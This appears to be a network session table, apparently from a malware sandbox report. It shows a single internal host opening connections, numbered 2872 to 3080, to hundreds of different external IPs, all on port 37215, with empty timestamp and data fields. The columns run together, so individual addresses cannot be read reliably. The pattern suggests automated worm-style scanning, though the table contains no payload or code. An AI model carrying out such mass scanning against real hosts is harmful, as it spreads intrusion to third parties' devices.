                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2872192.168.2.134045019.33.61.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2873192.168.2.134040641.93.243.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2874192.168.2.1341216157.241.25.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2875192.168.2.1350686197.140.13.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2876192.168.2.1332970157.69.47.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2877192.168.2.134482898.249.207.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2878192.168.2.1344882197.61.165.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2879192.168.2.1346670197.93.182.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2880192.168.2.135755241.16.117.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2881192.168.2.1347366157.175.38.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2882192.168.2.1352864197.186.237.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2883192.168.2.134767041.154.13.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2884192.168.2.1339790139.62.24.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2885192.168.2.1358192212.1.174.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2886192.168.2.1333682157.174.246.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2887192.168.2.1339318197.4.55.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2888192.168.2.134837641.2.111.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2889192.168.2.1352508197.216.5.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2890192.168.2.13602045.138.30.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2891192.168.2.1353366197.75.165.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2892192.168.2.134583289.138.23.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2893192.168.2.133908041.90.130.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2894192.168.2.1357978149.135.205.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2895192.168.2.1343512157.145.159.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2896192.168.2.1352348171.255.72.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2897192.168.2.1360930184.7.92.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2898192.168.2.1353598123.96.16.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2899192.168.2.1347894197.202.43.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2900192.168.2.1339530157.162.45.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2901192.168.2.136033641.30.113.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2902192.168.2.1335560125.45.133.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2903192.168.2.1350016157.166.135.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2904192.168.2.1345524197.154.35.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2905192.168.2.133595241.45.31.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2906192.168.2.1334532157.191.61.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2907192.168.2.1360994197.69.237.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2908192.168.2.133579841.44.80.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2909192.168.2.1360254157.137.182.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2910192.168.2.1346472109.7.138.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2911192.168.2.1348386197.254.19.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2912192.168.2.135943041.88.147.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2913192.168.2.1348042197.112.55.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2914192.168.2.135027641.25.41.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2915192.168.2.134216041.128.11.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2916192.168.2.1354664157.189.19.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2917192.168.2.135472041.110.140.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2918192.168.2.1342242197.90.197.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2919192.168.2.13366864.234.73.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2920192.168.2.1345020197.1.173.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2921192.168.2.134671441.89.63.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2922192.168.2.1352412197.168.140.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2923192.168.2.1343460157.129.60.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2924192.168.2.1358562197.235.119.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2925192.168.2.1338372197.132.2.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2926192.168.2.1334554197.201.15.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2927192.168.2.134331027.183.33.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2928192.168.2.1336666157.139.153.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2929192.168.2.1343126157.79.189.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2930192.168.2.133517841.67.190.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2931192.168.2.1347312157.253.151.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2932192.168.2.135174241.54.215.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2933192.168.2.1345302207.180.29.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2934192.168.2.1346832210.217.81.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2935192.168.2.1341666101.182.102.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2936192.168.2.1337416157.126.60.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2937192.168.2.134975041.89.46.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2938192.168.2.134941641.240.211.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2939192.168.2.1358450157.24.32.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2940192.168.2.1358726157.139.122.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2941192.168.2.1337142114.23.39.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2942192.168.2.1349076157.229.38.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2943192.168.2.1346790157.20.143.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2944192.168.2.1343850184.139.221.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2945192.168.2.1345320197.133.154.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2946192.168.2.134046841.132.63.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2947192.168.2.1345722157.43.144.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2948192.168.2.1338782157.110.100.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2949192.168.2.133605693.139.238.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2950192.168.2.134203841.56.166.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2951192.168.2.1351030197.125.12.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2952192.168.2.1356936197.71.69.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2953192.168.2.1354650157.177.67.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2954192.168.2.134391093.69.33.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2955192.168.2.1360112157.171.211.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2956192.168.2.134660251.249.106.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2957192.168.2.1344040157.92.161.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2958192.168.2.1353212157.210.187.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2959192.168.2.1332978157.67.38.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2960192.168.2.1360936197.109.162.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2961192.168.2.134715271.178.156.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2962192.168.2.134149673.234.58.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2963192.168.2.1353274157.234.19.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2964192.168.2.134838036.82.121.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2965192.168.2.1336528204.232.85.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2966192.168.2.1333068148.238.47.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2967192.168.2.1350916157.128.75.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2968192.168.2.1352652197.149.7.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2969192.168.2.135575441.141.69.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2970192.168.2.1355108197.102.107.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2971192.168.2.133721041.63.12.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2972192.168.2.1347614157.158.245.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2973192.168.2.1360976106.135.129.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2974192.168.2.135489296.246.208.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2975192.168.2.1351722157.114.231.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2976192.168.2.133367241.25.255.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2977192.168.2.1358940197.240.35.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2978192.168.2.133454899.145.37.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2979192.168.2.1350060158.8.122.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2980192.168.2.1336496157.135.73.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2981192.168.2.1340970195.230.40.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2982192.168.2.1347020197.10.167.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2983192.168.2.1360208157.179.158.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2984192.168.2.1343382197.245.165.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2985192.168.2.1357384157.124.79.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2986192.168.2.1340864197.91.121.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2987192.168.2.1342512157.203.57.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2988192.168.2.1354706157.38.55.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2989192.168.2.1346706159.135.45.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2990192.168.2.1351490163.1.212.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2991192.168.2.134598041.44.111.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2992192.168.2.133459012.164.181.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2993192.168.2.1342168157.53.129.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2994192.168.2.135961641.71.228.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2995192.168.2.1333754142.143.183.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2996192.168.2.1356730157.213.127.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2997192.168.2.1356172187.247.57.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2998192.168.2.133891441.179.51.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2999192.168.2.1342158157.39.158.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3000192.168.2.1341316197.46.68.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3001192.168.2.133318241.65.196.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3002192.168.2.1341454106.68.129.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3003192.168.2.135816441.84.222.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3004192.168.2.1343850197.168.44.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3005192.168.2.133599441.178.106.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3006192.168.2.135523873.153.148.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3007192.168.2.1337446157.73.149.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3008192.168.2.1333476197.164.108.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3009192.168.2.135137093.254.117.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3010192.168.2.1349140212.182.220.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3011192.168.2.1356128197.160.108.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3012192.168.2.135402046.142.52.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3013192.168.2.134287827.90.29.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3014192.168.2.135565241.104.194.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3015192.168.2.1351190197.230.99.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3016192.168.2.1345906197.215.176.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3017192.168.2.135243680.137.143.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3018192.168.2.1348232157.56.221.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3019192.168.2.134706878.155.113.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3020192.168.2.1355788197.44.211.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3021192.168.2.1344794137.153.33.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3022192.168.2.1352818185.119.179.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3023192.168.2.1338834157.231.80.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3024192.168.2.1344066141.202.161.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3025192.168.2.134854841.167.123.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3026192.168.2.1347662157.2.228.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3027192.168.2.1348154197.211.105.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3028192.168.2.133643441.191.255.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3029192.168.2.1341706197.22.97.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3030192.168.2.1334894197.105.95.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3031192.168.2.1347202189.110.44.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3032192.168.2.1345694157.15.186.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3033192.168.2.1357668137.241.187.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3034192.168.2.133712252.232.188.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3035192.168.2.133892641.72.217.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3036192.168.2.1351518197.87.34.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3037192.168.2.1359610157.238.148.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3038192.168.2.1335028157.155.246.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3039192.168.2.1343550197.45.77.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3040192.168.2.1346326197.38.84.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3041192.168.2.1348580157.187.159.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3042192.168.2.1351508157.44.108.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3043192.168.2.133292243.136.82.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3044192.168.2.133379041.75.124.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3045192.168.2.134874641.29.84.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3046192.168.2.1356704157.0.55.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3047192.168.2.1339548157.51.53.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3048192.168.2.1333542197.45.97.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3049192.168.2.1347078157.25.36.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3050192.168.2.1342006101.229.114.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3051192.168.2.1336108197.142.203.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3052192.168.2.1333502122.131.59.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3053192.168.2.1333072197.24.53.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3054192.168.2.1360982197.119.218.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3055192.168.2.1349068157.177.62.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3056192.168.2.1348548197.25.2.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3057192.168.2.1341990197.43.160.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3058192.168.2.1333038197.45.182.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3059192.168.2.134148641.151.13.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3060192.168.2.134308241.16.24.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3061192.168.2.1360664197.235.217.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3062192.168.2.134580241.137.66.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3063192.168.2.1338342197.70.231.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3064192.168.2.134388041.13.183.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3065192.168.2.133364885.199.126.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3066192.168.2.134576841.201.174.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3067192.168.2.1333354157.192.181.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3068192.168.2.1335288133.143.42.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3069192.168.2.134572866.203.52.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3070192.168.2.134413097.245.187.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3071192.168.2.135562264.247.74.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3072192.168.2.135699617.230.73.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3073192.168.2.1335554197.12.229.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3074192.168.2.1332982197.24.110.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3075192.168.2.1355666197.51.162.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3076192.168.2.1340418157.139.25.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3077192.168.2.133961047.165.109.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3078192.168.2.1345110100.7.50.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3079192.168.2.1353948197.176.253.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3080192.168.2.1340298166.63.151.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
